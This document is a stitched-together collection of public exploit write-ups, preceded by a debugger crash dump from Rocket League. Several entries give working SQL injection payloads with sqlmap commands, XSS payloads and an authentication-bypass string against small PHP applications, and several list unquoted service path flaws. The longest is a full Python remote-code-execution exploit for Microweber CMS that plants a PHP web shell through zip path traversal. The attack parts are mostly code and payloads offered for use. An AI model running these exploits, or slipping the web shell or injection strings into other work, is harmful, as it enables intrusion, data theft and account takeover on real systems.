nv up ei pl nz na pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 VCRUNTIME140!memcmp+0xee: 00007ffe`afc812de f3a4 rep movs byte ptr [rdi],byte ptr [rsi] 0:000> g (3568.230c): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE RocketLeague!AK::MemoryMgr::GetPoolName+0x84164: 00007ff6`4a660424 cd29 int 29h 0:000> .exr -1 ExceptionAddress: 00007ff64a660424 (RocketLeague!AK::MemoryMgr::GetPoolName+0x0000000000084164) ExceptionCode: c0000409 (Security check failure or stack buffer overrun) ExceptionFlags: 00000001 NumberParameters: 1 Parameter[0]: 0000000000000002 Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE 0:000> u 00007ff64a660424 RocketLeague!AK::MemoryMgr::GetPoolName+0x84164: 00007ff6`4a660424 cd29 int 29h 00007ff6`4a660426 488d0d3303f600 lea rcx,[RocketLeague!AK::IAkStreamMgr::m_pStreamMgr+0x1d678 (00007ff6`4b5c0760)] 00007ff6`4a66042d e8ca010000 call RocketLeague!AK::MemoryMgr::GetPoolName+0x8433c (00007ff6`4a6605fc) 00007ff6`4a660432 488b442438 mov rax,qword ptr [rsp+38h] 00007ff6`4a660437 4889051a04f600 mov qword ptr [RocketLeague!AK::IAkStreamMgr::m_pStreamMgr+0x1d770 (00007ff6`4b5c0858)],rax 00007ff6`4a66043e 488d442438 lea rax,[rsp+38h] 00007ff6`4a660443 4883c008 add rax,8 00007ff6`4a660447 488905aa03f600 mov qword ptr [RocketLeague!AK::IAkStreamMgr::m_pStreamMgr+0x1d710 (00007ff6`4b5c07f8)],rax 0:000> kb 10 # RetAddr : Args to Child : Call Site 00 00007ff6`4a65fdcf : efaf2d5d`3bda668e 00000000`00000000 00000098`52afe090 00000098`52afe080 : RocketLeague!AK::MemoryMgr::GetPoolName+0x84164 01 00007ffe`d735207f : 00007ff6`4a65fdbc 00000000`00000000 00000000`00000000 00000000`00000000 : RocketLeague!AK::MemoryMgr::GetPoolName+0x83b0f 02 00007ffe`d7301454 : 00000000`00000000 00000098`52afe070 00000098`52afe730 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xf 03 00007ffe`d7350bae : 3f400000`3f000000 3f800000`3f800000 000001a1`cc362268 44160000`44bb8000 : ntdll!RtlDispatchException+0x244 04 00007ffe`afc812de : 00000000`00000000 000001a1`cc3560c0 00007ff6`4948a38b 000001a1`cc362268 : ntdll!KiUserExceptionDispatch+0x2e 05 00007ff6`4948a38b : 000001a1`cc362268 00000098`52afea40 00000098`52afea40 000001a1`cc362268 : VCRUNTIME140!memcpy_repmovs+0xe [d:\agent\_work\1\s\src\vctools\crt\vcruntime\src\string\amd64\memcpy.asm @ 114] 06 00007ff6`494fe648 : 000001a1`cc362268 00000098`52afead8 00002215`1710d82a 00007ff6`00000003 : RocketLeague!AK::MusicEngine::Term+0x9700b 07 00007ff6`494e3e65 : 000001a1`cc362080 00000098`52afead8 00000000`00000000 00000000`00000001 : RocketLeague!AK::MusicEngine::Term+0x10b2c8 08 fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : RocketLeague!AK::MusicEngine::Term+0xf0ae5 09 efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60 0a fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : 0xefaf2dc5`69758c3e 0b efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60 0c fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : 0xefaf2dc5`69758c3e 0d efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60 0e fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : 0xefaf2dc5`69758c3e 0f efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60 0:000> !analyze -m ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* KEY_VALUES_STRING: 1 Key : Analysis.CPU.mSec Value: 5640 Key : Analysis.DebugAnalysisManager Value: Create Key : Analysis.Elapsed.mSec Value: 6467 Key : Analysis.Init.CPU.mSec Value: 400749 Key : Analysis.Init.Elapsed.mSec Value: 1699165 Key : Analysis.Memory.CommitPeak.Mb Value: 261 Key : FailFast.Name Value: STACK_COOKIE_CHECK_FAILURE Key : FailFast.Type Value: 2 Key : Timeline.OS.Boot.DeltaSec Value: 215108 Key : Timeline.Process.Start.DeltaSec Value: 1744 Key : WER.OS.Branch Value: vb_release Key : WER.OS.Timestamp Value: 2019-12-06T14:06:00Z Key : WER.OS.Version Value: 10.0.19041.1 Key : WER.Process.Version Value: 1.0.10897.0 NTGLOBALFLAG: 0 PROCESS_BAM_CURRENT_THROTTLED: 0 PROCESS_BAM_PREVIOUS_THROTTLED: 0 APPLICATION_VERIFIER_FLAGS: 0 EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 00007ff64a660424 (RocketLeague!AK::MemoryMgr::GetPoolName+0x0000000000084164) ExceptionCode: c0000409 (Security check failure or stack buffer overrun) ExceptionFlags: 00000001 NumberParameters: 1 Parameter[0]: 0000000000000002 Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE FAULTING_THREAD: 0000230c PROCESS_NAME: RocketLeague.exe ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE_STR: c0000409 EXCEPTION_PARAMETER1: 0000000000000002 STACK_TEXT: 00000098`52afda90 00007ff6`4a65fdcf : efaf2d5d`3bda668e 00000000`00000000 00000098`52afe090 00000098`52afe080 : RocketLeague!AK::MemoryMgr::GetPoolName+0x84164 00000098`52afdad0 00007ffe`d735207f : 00007ff6`4a65fdbc 00000000`00000000 00000000`00000000 00000000`00000000 : RocketLeague!AK::MemoryMgr::GetPoolName+0x83b0f 00000098`52afdb00 00007ffe`d7301454 : 00000000`00000000 00000098`52afe070 00000098`52afe730 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xf 00000098`52afdb30 00007ffe`d7350bae : 3f400000`3f000000 3f800000`3f800000 000001a1`cc362268 44160000`44bb8000 : ntdll!RtlDispatchException+0x244 00000098`52afe240 00007ffe`afc812de : 00000000`00000000 000001a1`cc3560c0 00007ff6`4948a38b 000001a1`cc362268 : ntdll!KiUserExceptionDispatch+0x2e 00000098`52afe9c8 00007ff6`4948a38b : 000001a1`cc362268 00000098`52afea40 00000098`52afea40 000001a1`cc362268 : VCRUNTIME140!memcpy_repmovs+0xe 00000098`52afe9e0 00007ff6`494fe648 : 000001a1`cc362268 00000098`52afead8 00002215`1710d82a 00007ff6`00000003 : RocketLeague!AK::MusicEngine::Term+0x9700b 00000098`52afea20 00007ff6`494e3e65 : 000001a1`cc362080 00000098`52afead8 00000000`00000000 00000000`00000001 : RocketLeague!AK::MusicEngine::Term+0x10b2c8 00000098`52afeab0 fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : RocketLeague!AK::MusicEngine::Term+0xf0ae5 ... ... STACK_COMMAND: ~0s ; .cxr ; kb SYMBOL_NAME: RocketLeague!AK::MemoryMgr::GetPoolName+84164 MODULE_NAME: RocketLeague IMAGE_NAME: RocketLeague.exe FAILURE_BUCKET_ID: FAIL_FAST_STACK_BUFFER_OVERRUN_STACK_COOKIE_CHECK_FAILURE_MISSING_GSFRAME_c0000409_RocketLeague.exe!AK::MemoryMgr::GetPoolName OS_VERSION: 10.0.19041.1 BUILDLAB_STR: vb_release OSPLATFORM_TYPE: x64 OSNAME: Windows 10 IMAGE_VERSION: 1.0.10897.0 FAILURE_ID_HASH: {3e6f3f5b-25bb-68b3-2a5b-232743df7884} Followup: MachineOwner

# Exploit Title: DHCP Broadband 4.1.0.1503 - 'dhcpt.exe' Unquoted Service Path # Discovery by: Erick Galindo # Discovery Date: 2020-05-07 # Vendor Homepage: https://www.weird-solutions.com # Software : https://www.weird-solutions.com/download/products/dhcpbbv4_retail_x64.exe # Tested Version: 4.1.0.1503 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\> wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DHCP" DHCP Broadband 4 DHCP Broadband 4 C:\Program Files\DHCP Broadband 4\dhcpt.exe Auto # Service info C:\>sc qc "DHCP Broadband 4" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: DHCP Broadband 4 TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\DHCP Broadband 4\dhcpt.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : DHCP Broadband 4 DEPENDENCIAS : Nsi : Afd : NetBT : Tcpip NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.

# Exploit Title: PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection # Date: 03.05.2021 # Exploit Author: Tyler Butler # Vendor Homepage: http://timeclock.sourceforge.net # Software Link: https://sourceforge.net/projects/timeclock/files/PHP%20Timeclock/PHP%20Timeclock%201.04/ # Version: 1.04 # Tested on: PHP 4.4.9/5.3.3 Apache 2.2 MySql 4.1.22/5 Description: PHP Timeclock is vulnerable to both Boolean and Time Based SQL Injection on login.php via the login_userid parameter. This PoC shows how SQLmap can be used to exploit this vulnerability to dump database contents Boolean Based Payload: user' RLIKE (SELECT (CASE WHEN (8535=8535) THEN 0x75736572 ELSE 0x28 END))-- QwMo&login_password=pass Time Based Payload: user' AND (SELECT 4247 FROM (SELECT(SLEEP(5)))ztHm) AND 'WHmv'='WHmv&login_password=pass Steps to reproduce: 1. Run sqlmap against a instance of PHP Timeclock 2. Follow the instructions below for specific versions of MySQL MySQL >= 5.0.12: $ sqlmap -u http://localhost/login.php --method POST --data "login_userid=user&login_password=pass" -p login_userid --not-string="Warning" --dbms=MySQL --technique=TB --current-db --- Parameter: login_userid (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: login_userid=user' AND (SELECT 4247 FROM (SELECT(SLEEP(5)))ztHm) AND 'WHmv'='WHmv&login_password=pass --- MySQL < 5: On versions using MySQL < 5, table names must be included as arguments as information_schema was not introduced into MySQL yet. $ sqlmap -u http://localhost/login.php --method POST --data "login_userid=user&login_password=pass" -p login_userid --not-string="Warning" --technique=B -D timeclock -T employees, -C empfullname --dump --dbms=MySQL -v --- Parameter: login_userid (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: login_userid=user' RLIKE (SELECT (CASE WHEN (8535=8535) THEN 0x75736572 ELSE 0x28 END))-- QwMo&login_password=pass ---

# Exploit Title: BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path # Discovery by: Erick Galindo # Discovery Date: 2020-05-07 # Vendor Homepage: https://www.weird-solutions.com # Software : https://www.weird-solutions.com/download/products/bootpt_demo_x64.exe # Tested Version: 2.0.0.1253 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\> wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "BOOTP" BOOTP Turbo BOOTP Turbo C:\Program Files\BOOTP Turbo\bootpt.exe Auto # Service info C:\>sc qc "BOOTP Turbo" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: BOOTP Turbo TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\BOOTP Turbo\bootpt.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : BOOTP Turbo DEPENDENCIAS : Nsi : Afd : NetBT : Tcpip NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.

# Exploit Title: TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path # Discovery by: Erick Galindo # Discovery Date: 2020-05-07 # Vendor Homepage: https://www.weird-solutions.com # Software : https://www.weird-solutions.com/download/products/tftpbbv4_retail_x64.exe # Tested Version: 4.3.0.1465 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "tftpt" TFTP Broadband 4 TFTP Broadband 4 C:\Program Files\TFTP Broadband 4\tftpt.exe Auto C:\>sc qc "TFTP Broadband 4" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: TFTP Broadband 4 TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\TFTP Broadband 4\tftpt.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : TFTP Broadband 4 DEPENDENCIAS : Nsi : Afd : NetBT : Tcpip NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.

# Exploit Title: PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS) # Date: May 3rd 2021 # Exploit Author: Tyler Butler # Vendor Homepage: http://timeclock.sourceforge.net # Software Link: https://sourceforge.net/projects/timeclock/files/PHP%20Timeclock/PHP%20Timeclock%201.04/ # Version: 1.04 # Tested on: PHP 4.4.9/5.3.3 Apache 2.2 MySql 4.1.22/5 Description: PHP Timeclock version 1.04 (and prior) suffers from multiple Cross-Site Scripting vulnerabilities #1: Unauthenticated Reflected XSS: Arbitrary javascript can be injected into the application by appending a termination /'> and payload directly to the end of the GET request URL. The vulnerable paths include (1) /login.php (2) /timeclock.php (3) /reports/audit.php and (4) /reports/timerpt.php. Payload: /'><svg/onload=alert`xss`> Example: http://target/login.php/'%3E%3Csvg/onload=alert%60xss%60%3E ß Steps to reproduce: 1. Navigate to a site that uses PHP Timeclock 1.04 or earlier 2. Make a GET request to one of the four resources mentioned above 3. Append /'> and the payload to the end of the request 4. Submit the request and observe payload execution #2: Unauthenticated Reflected XSS: Arbitrary javascript can be injected into the application in POST requests to (1) /reports/audit.php (2) /reports/total_hours.php (3) /reports/timerpt.php via the from_date and to_date parameters. # Example: POST /reports/audit.php HTTP/1.1 Host: localhost Content-Length: 98 Cache-Control: max-age=0 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/reports/audit.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=62cfcffbd929595ba31915b4d8f01d7d; remember_me=foo Connection: close date_format=M%2Fd%2Fyyyy&from_date=5%2F2%2F2021'><svg/onload=alert`xss`>&to_date=5%2F18%2F2021&csv=0&submit.x=40&submit.y=5 Payload: '><svg/onload=alert`xss`> Steps to reproduce: 1. Navigate to a site that uses PHP Timeclock 1.04 or earlier 2. Create a report at one of the vulnerable directories noted above 3. Intercept the request with a proxy tool like BurpSuite 4. Inject payload into the from_date or to_date fields

# Exploit Title: Human Resource Information System 0.1 - 'First Name' Persistent Cross-Site Scripting (Authenticated) # Date: 04-05-2021 # Exploit Author: Reza Afsahi # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html # Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code # Version: 0.1 # Tested on: PHP 7.4.11 , Linux x64_x86 # --- Description --- # # The web application allows for an assisstant to inject persistent Cross-Site-Scripting payload which will be executed in both assistant and Super Admin panel # --- Proof of concept --- # 1- Login as Assistant and go to: http://localhost/code/Admin_Dashboard/Add_employee.php 2- Click on Add Employee button 3- Inject this payload into First Name input : <script>alert('xss')</script> 4- and fill other inputs as you want (Other inputs might be vulnerable as well) then click on Save button. 5- refresh the page and Xss popup will be triggered. 6- Now if Super Admin visit this page in his/her Dashboard : http://localhost/code/Superadmin_Dashboard/Add_employee.php 7- Our Xss payload will be executed on Super Admin Browser ** Attacker can use this vulnerability to take over Super Admin account **

# Exploit Title: Microweber CMS 1.1.20 - Remote Code Execution (Authenticated) # Date: 2020-10-31 # Exploit Author: sl1nki # Vendor Homepage: https://microweber.org/ # Software Link: https://github.com/microweber/microweber/tree/1.1.20 # Version: <=1.1.20 # Tested on: Ubuntu 18.04 # CVE : CVE-2020-28337 # # Example usage with default phpinfo() payload: # ./microweber_rce.py \ # --hostname "http://microwebertest.com" \ # --username "admin" \ # --password "password123" # # # Example usage with custom payload (shell_exec): # ./microweber_rce.py \ # --hostname "http://microwebertest.com" \ # --username "admin" \ # --password "password123" \ # --payload '<?php if (isset($_REQUEST["fexec"])) {echo "<pre>" . shell_exec($_REQUEST["fexec"]) . "</pre>";} ?>' # # Notes: # * SSL verification is disabled by default # * If for some reason the --target-path "/userfiles/cache #!/usr/bin/python3 #/" doesn't work, "/userfiles/modules/" is a good one too. # # # import argparse import re import requests import sys import zipfile from io import BytesIO # Disable insecure SSL warnings requests.packages.urllib3.disable_warnings() class Microweber(): def __init__(self, baseUrl, proxies=None): self.baseUrl = baseUrl self.proxies = proxies self.cookies = None self.loginUrl = "/api/user_login" self.uploadUrl = "/plupload" self.moveZipToBackupUrl = "/api/Microweber/Utils/Backup/move_uploaded_file_to_backup" self.restoreBackupUrl = "/api/Microweber/Utils/Backup/restore" self.targetPath = "/userfiles/cache/" self.targetFilename = "payload.php" self.zipPayloadName = "payload.zip" def makePostRequest(self, url, data=None, files=None, headers=None): return requests.post(self.baseUrl + url, data=data, files=files, headers=headers, cookies=self.cookies, proxies=self.proxies, verify=False ) def makeGetRequest(self, url, params=None): return requests.post(self.baseUrl + url, params=params, cookies=self.cookies, proxies=self.proxies, verify=False ) def login(self, username, password): res = self.makePostRequest(self.loginUrl, data={ "username": username, "password": password }) if res.status_code == 200 and 'success' in res.json() and res.json()['success'] == "You are logged in!": print(f"[+] Successfully logged in as {username}") self.cookies = res.cookies else: print(f"[-] Unable to login. Status Code: {res.status_code}") sys.exit(-1) def createZip(self, path=None, filename=None, payload=None): # In-memory adaptation of ptoomey3's evilarc # https://github.com/ptoomey3/evilarc if payload == None: payload = "<?php phpinfo(); ?>" zd = BytesIO() zf = zipfile.ZipFile(zd, "w") # The custom Unzip class uses a path under the webroot for cached file extraction # /storage/cache/backup_restore/<md5 hash>/ # so moving up 4 directories puts us at the webroot zf.writestr(f"../../../..{path}{filename}", payload) zf.close() return zd def uploadZip(self, zipData): # Upload the zip data as a general file res = self.makePostRequest(self.uploadUrl, headers={"Referer": ""}, data={ "name": self.zipPayloadName, "chunk": 0, "chunks": 1 }, files={"file": (self.zipPayloadName, zipData.getvalue(), "application/zip")} ) if res.status_code == 200: print(f"[+] Successfully uploaded: {self.zipPayloadName}") j = res.json() print(f"[+] URL: {j['src']}") print(f"[+] Resulting Filename: {j['name']}") self.zipPayloadName = j['name'] else: print(f"[-] Unable to upload: {self.zipPayloadName} (Status Code: {res.status_code})") sys.exit(-1) def getAbsoluteWebRoot(self): # Determine the webroot using the debug output and the DefaultController.php path res = self.makeGetRequest("", params={ "debug": "true" }) if res.status_code != 200: print(f"[-] Unable to collect debug information. Bad server response: {res.status_code}") sys.exit(-1) target = "src/Microweber/Controllers/DefaultController.php" m = re.findall('([\/\w]+)\/src\/Microweber\/Controllers\/DefaultController\.php', res.text) if len(m) == 1: return m[0] else: print(f"[-] Unable to determine the webroot using {target}. Found {len(m)} matches") def moveZipToBackup(self): # Move the uploaded zip file into the backup directory webRoot = self.getAbsoluteWebRoot() hostname = self.baseUrl.split("//")[1] src = f"{webRoot}/userfiles/media/{hostname}/{self.zipPayloadName}" res = self.makeGetRequest(self.moveZipToBackupUrl, params={ "src": src }) if res.status_code == 200 and 'success' in res.json() and res.json()['success'] == f"{self.zipPayloadName} was uploaded!": print(f"[+] Successfully moved {self.zipPayloadName} to backup") else: print(f"[-] Unable to move zip to backup ({res.status_code})") sys.exit(-1) def restoreBackup(self, filename): # With the zip file in the backup directory, 'restore' it, which will cause it to be extracted unsafely res = self.makePostRequest(self.restoreBackupUrl, data={ "id": filename }) if res.status_code == 200 and "Backup was restored!" in res.text: print(f"[+] Successfully restored backup {filename}") else: print(f"[-] Unable to restore backup {filename}") sys.exit(-1) def exploit(self, payload=None): zipData = m.createZip(self.targetPath, self.targetFilename, payload=payload) m.uploadZip(zipData) m.moveZipToBackup() m.restoreBackup(self.zipPayloadName) print(f"[+] Successfully uploaded payload to {self.targetFilename}!=") print(f"[+] Visit: {self.baseUrl}{self.targetPath}{self.targetFilename}") if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--hostname", required=True, dest="hostname", help="Microweber hostname with protocol (e.g. http://microwebertest.com)") parser.add_argument("--http-proxy", required=False, dest="http_proxy", help="HTTP Proxy (e.g. http://127.0.0.1:8000)") parser.add_argument("--username", "-u", required=True, dest="username", help="Username of administrative user") parser.add_argument("--password", "-p", required=True, dest="password", help="Password of administrative user") parser.add_argument("--payload", required=False, dest="payload", help="Payload contents. Should be a string of PHP code. (default is phpinfo() )") # Uncommon args parser.add_argument("--target-file", required=False, dest="target_file", help="Target filename of the payload (default: payload.php") parser.add_argument("--target-path", required=False, dest="target_path", help="Target path relative to webroot for the payload (default: /userfiles/cache/") parser.add_argument("--zip-name", required=False, dest="zip_name", help="File name of tmp backup zip") args = parser.parse_args() proxies = None if args.http_proxy: proxies = { "http": args.http_proxy } m = Microweber(args.hostname, proxies=proxies) if args.target_file: m.targetFilename = args.target_file if args.target_path: m.targetPath = args.target_path if args.zip_name: m.zipPayloadName = args.zip_name m.login(args.username, args.password) m.exploit(args.payload)

# Exploit Title: Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path # Exploit Author: 1F98D # Vendor Homepage: https://www.odoo.com/ # Software Link: https://nightly.odoo.com/12.0/nightly/windows/odoo_12.0.20190101.exe # Tested Version: 12.0.20190101 # Tested on OS: Windows # Step to discover Unquoted Service Path: C:\> icacls "C:\Program Files (x86)\Odoo 12.0\nssm" C:\Program Files (x86)\Odoo 12.0\nssm pc-1\user-1:(OI)(CI)(M) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(RX) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) CREATOR OWNER:(I)(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi) # Date: 12.05.2021 # Exploit Author: Mesut Cetin # Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code # Version: 1.0 # Tested on: Ubuntu 18.04 TLS # Description: # Attacker can bypass admin login page due to unsanitized user input and access internal contents # vulnerable code in /admin/index.php, line 34: $query = "SELECT * FROM users WHERE username='$username' AND password='$password'"; # payload: admin' or '1' = '1 -- - # Proof of concept: http://localhost/admin/index.php POST /admin/index.php HTTP/1.1 Host: localhost Content-Length: 54 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; E6653 Build/32.2.A.0.253) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/admin/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=3cjdtku76ggasqei49gng91p3p dnt: 1 sec-gpc: 1 Connection: close username=admin'+or+'1'%3d1+--+-&password=test&submit=